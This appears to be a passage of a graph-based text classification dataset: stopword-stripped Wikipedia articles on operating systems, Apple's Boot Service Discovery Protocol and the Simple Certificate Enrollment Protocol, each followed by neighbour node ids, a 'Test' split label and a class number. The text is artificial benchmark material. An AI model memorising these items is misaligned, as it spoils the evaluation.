windows vista versions linux 2.6 driver execution co-operative meaning driver entered infinite loop would freeze system recent revisions operating systems incorporate kernel preemption kernel interrupts driver give tasks separates process receives response device driver gives tasks currently operating systems support variety networking protocols hardware applications using means computers running dissimilar operating systems participate common network sharing resources computing files printers scanners using either wired wireless connections networks essentially allow computer operating system access resources remote computer support functions could resources connected directly local computer includes everything simple communication using networked file systems even sharing another computer graphics sound hardware network services allow resources computer accessed transparently ssh allows networked users direct access computer command line interface client/server networking allows program computer called client connect via network another computer called server servers offer host various services network computers users services usually provided ports numbered access points beyond server ip address port number usually associated maximum one running program responsible handling requests port daemon user program turn access local hardware resources computer passing requests operating system kernel many operating systems support one vendor-specific open networking protocols well example sna ibm systems decnet systems digital equipment corporation microsoft-specific protocols smb windows specific protocols specific tasks may also supported nfs file access protocols like esound esd easily extended network provide sound local applications remote system sound hardware computer secure depends number technologies working properly modern operating system provides access number resources available software running system external devices like networks via kernel operating system must capable distinguishing requests allowed processed others processed systems may simply distinguish privileged non-privileged systems commonly form requester identity user name establish identity may process authentication often username must quoted username may password methods authentication magnetic cards biometric data might used instead cases especially connections network resources may accessed authentication reading files network share also covered concept requester identity authorization particular services resources accessible requester logged system tied either requester user account variously configured groups users requester belongs addition allow disallow model security system high level security also offers auditing options would allow tracking requests access resources reading file internal security security already running program possible possibly harmful requests must carried interrupts operating system kernel programs directly access hardware resources secured external security involves request outside computer login connected console kind network connection external requests often passed device drivers operating system kernel passed onto applications carried directly security operating systems long concern highly sensitive data held computers commercial military nature united states government department defense dod created trusted computer system evaluation criteria tcsec standard sets basic requirements assessing effectiveness security became vital importance operating system makers tcsec used evaluate classify select trusted operating systems considered processing storage retrieval sensitive classified information network services include offerings file sharing print services email web sites file transfer protocols ftp compromised security front line security hardware devices known firewalls intrusion detection/prevention systems operating system level number software firewalls available well intrusion detection/prevention systems modern operating systems include software firewall enabled default software firewall configured allow deny network traffic service application running operating system therefore one install running insecure service telnet ftp threatened security breach firewall would deny traffic trying connect service port alternative strategy sandbox strategy available systems meet popek goldberg virtualization requirements operating system running user programs native code instead either emulates processor provides host p-code based system java internal security especially relevant multi-user systems allows user system private files users tamper read internal security also vital auditing use since program potentially bypass operating system inclusive bypassing auditing every computer operated individual requires user interface user interface usually referred shell essential human interaction supported user interface views directory structure requests services operating system acquire data input hardware devices keyboard mouse credit card reader requests operating system services display prompts status messages output hardware devices video monitor printer two common forms user interface historically command-line interface computer commands typed line-by-line graphical user interface visual environment commonly wimp present modern computer systems support graphical user interfaces gui often include computer systems original implementation classic mac os gui integrated kernel technically graphical user interface operating system service incorporating support one operating system kernel allow gui responsive reducing number context switches required gui perform output functions operating systems modular separating graphics subsystem kernel operating system 1980s unix vms many others operating systems built way linux macos also built way modern releases microsoft windows windows vista implement graphics subsystem mostly user-space however graphics drawing routines versions windows nt 4.0 windows server 2003 exist mostly kernel space windows 9x little distinction interface kernel many computer operating systems allow user install create user interface desire x window system conjunction gnome kde plasma 5 commonly found setup unix unix-like bsd linux solaris systems number windows shell replacements released microsoft windows offer alternatives included windows shell shell separated windows numerous unix-based guis existed time derived x11 competition among various vendors unix hp ibm sun led much fragmentation though effort standardize 1990s cose cde failed various reasons eventually eclipsed widespread adoption gnome k desktop environment prior free software-based toolkits desktop environments motif prevalent toolkit/desktop combination basis upon cde developed graphical user interfaces evolve time example windows modified user interface almost every time new major version windows released mac os gui changed dramatically introduction mac os x 1999 real-time operating system rtos operating system intended applications fixed deadlines real-time computing applications include small embedded systems automobile engine controllers industrial robots spacecraft industrial control large-scale computing systems early example large-scale real-time operating system transaction processing facility developed american airlines ibm sabre airline reservations system embedded systems fixed deadlines use real-time operating system vxworks pikeos ecos qnx montavista linux rtlinux windows ce real-time operating system shares similar apis desktop windows shares none desktop windows codebase symbian os also rtos kernel eka2 starting version 8.0b embedded systems use operating systems palm os bsd linux although operating systems support real-time computing operating system development one complicated activities computing hobbyist may engage hobby operating system may classified one whose code directly derived existing operating system users active developers cases hobby development support homebrew computing device example simple single-board computer powered 6502 microprocessor development may architecture already widespread use operating system development may come entirely new concepts may commence modeling existing operating system either case hobbyist his/her developer may interact small sometimes unstructured group individuals like interests examples hobby operating system include syllable templeos application software generally written use specific operating system sometimes even specific hardware porting application run another os functionality required application may implemented differently os names functions meaning arguments etc requiring application adapted changed otherwise maintained unix first operating system written assembly language making portable systems different native pdp-11 cost supporting operating systems diversity avoided instead writing applications software platforms java qt abstractions already borne cost adaptation specific operating systems system libraries another approach operating system vendors adopt standards example posix os abstraction layers provide commonalities reduce porting costs
[ 2, 8195, 7, 9, 8204, 15, 16, 8209, 18, 19, 22, 8214, 25, 8217, 8222, 8225, 8226, 8227, 8229, 39, 8233, 44, 45, 8241, 8243, 52, 8246, 56, 8248, 58, 61, 8254, 8256, 8258, 8259, 69, 70, 8262, 75, 76, 83, 85, 8278, 8280, 89, 8281,...
Test
7,984
5
Boot_Service_Discovery_Protocol:boot service discovery protocol boot service discovery protocol bsdp apple-developed standards-conforming extension dhcp allows macintosh computers boot bootable images network instead local storage media cd dvd hard disk dhcp options used vendor-specific information option number 43 vendor class identifier option number 60 three versions bsdp though usually version 1.0 used versions enable client choose several bootable images offered server reference implementation bsdp darwin bootp server part mac os netboot feature dhcp server client send vendor class option contains ascii-encoded string three parts delimited character first part aaplbsdpc advertises bsdp capability second part client architecture ppc i386 third part system identifier example intel-based imac sends vendor class list microsoft vendor classes found according dhcp option carrying number 43 reserved vendor specific information information stored following format vendor wants convey multiple options within option field done encapsulated vendor-specific extensions vendor encapsulated extensions contain one concatenated fields field consists following table describes possible field types numeric fields interpreted unsigned big endian integers following example illustrates construction vendor encapsulated option first field 01 01 02 means packet bsdp select message 01 declares field specifies bsdp message type next 01 indicates field contents one byte long — 02 code select following 08 04 81 00 07 e5 means boot image id 2164262885 selected finally 82 0a 4e 65 74 42 6f 6f 74 30 30 31 means string 0x0a 10 characters namely netboot001 name system boot
[ 10242, 3847, 649, 4490, 9868, 3218, 9365, 10005, 11413, 5402, 5531, 3742, 10271, 9380, 2085, 9381, 3751, 3752, 10924, 562, 2996, 9909, 6651, 10171, 3133, 3006, 4797, 5181, 5437, 7364, 2887, 8265, 842, 2509, 4687, 5843, 8404, 2904, 5469, 5...
Test
7,985
4
Simple_Certificate_Enrollment_Protocol:simple certificate enrollment protocol simple certificate enrollment protocol scep internet draft internet engineering task force ietf protocol used numerous manufacturers network equipment software developing simplified means handling certificates large-scale implementation everyday users well referenced industry standards protocol designed make issuing digital certificates scalable possible idea standard network user able request digital certificate electronically simply possible processes usually required intensive input network administrators suited large-scale deployments simple certificate enrollment protocol popular widely available tested certificate enrollment protocol although widely used example cisco ios operating system concerns raised able strongly authenticate certificate requests made users devices since exactly issues apply certificate issue protocols certificate management protocol certificate management cms clear real concern effectively abandoned original sponsors around 2010 internet draft describing protocol revived 2015 due widespread use industry standards updating algorithms used correcting numerous issues original specification accumulated considerable amount detritus time
[ 5834, 1836, 6704, 9744, 11387, 62 ]
Test